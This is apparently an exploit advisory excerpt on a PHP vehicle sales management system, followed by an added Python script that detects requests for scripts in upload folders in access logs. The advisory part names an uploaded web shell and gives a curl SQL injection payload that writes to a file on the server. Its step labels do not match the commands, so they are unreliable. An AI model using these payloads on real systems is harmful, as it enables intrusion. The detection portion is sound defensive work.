Vehicle sales management system multiple vulnerabilities Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2018-03-20 |
Type : webapps |
Platform : php
The malicious PHP file has been uploaded to /var/www/html/soyket-vsms-php-63b563b/login/uploads. Now, browse to the location and note the file name. In my case it's 1510529218getShell.php. To execute it, do:
curl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=checkuser -d "username=employee@employee.com' union select 'SQLIIII' into outfile'/tmp/stuff.txt"
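From the defender's side, a request for a script inside the upload directory is the clearest trace this leaves in the web server's access log. The following is an added detection example, not part of the original advisory or the application's code. It assumes the Apache/nginx "combined" log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
UPLOAD_DIR = re.compile(r'/uploads?/', re.IGNORECASE)
# Extensions usually mapped to the PHP handler; the lookahead also
# catches double extensions ("x.php.jpg") and path-info ("x.php/extra").
SCRIPT_EXT = re.compile(r'\.(?:php\d?|phtml|phar)(?=$|[/.])', re.IGNORECASE)

# Constructed sample lines (not taken from a real server).
BASE = "/soyket-vsms-php-63b563b/login"
SAMPLE_LOG = [
    f'10.0.0.5 - - [12/Nov/2017:23:26:58 +0000] "POST {BASE}/Actions.php?action=checkuser HTTP/1.1" 200 512 "-" "curl/7.55.1"',
    f'10.0.0.5 - - [12/Nov/2017:23:27:40 +0000] "GET {BASE}/uploads/1510529218getShell.php HTTP/1.1" 200 87 "-" "curl/7.55.1"',
    f'10.0.0.9 - - [12/Nov/2017:23:28:02 +0000] "GET {BASE}/uploads/1510529300car.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    f'10.0.0.5 - - [12/Nov/2017:23:29:11 +0000] "GET {BASE}/uploads/1510529400x.php%2ejpg HTTP/1.1" 404 209 "-" "curl/7.55.1"',
]


def find_upload_script_hits(lines):
    """Return one dict per request that addresses a script under an uploads directory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        # Drop the query string, then undo single and double URL-encoding.
        path = unquote(unquote(urlsplit(m["target"]).path))
        d = UPLOAD_DIR.search(path)
        if d and SCRIPT_EXT.search(path[d.end():]):
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "path": path,
                # A 2xx status means the server answered for the script.
                "served": m["status"].startswith("2"),
            })
    return hits


if __name__ == "__main__":
    for h in find_upload_script_hits(SAMPLE_LOG):
        level = "ALERT" if h["served"] else "probe"
        print(f'{level}: {h["ip"]} [{h["ts"]}] {h["path"]}')
```

The injection request itself is sent as a POST body (`-d`), so it does not appear in a standard access log; catching it needs request-body logging or a WAF. A hit with `served` set also shows that the upload directory is mapped to the PHP handler, which it should not be.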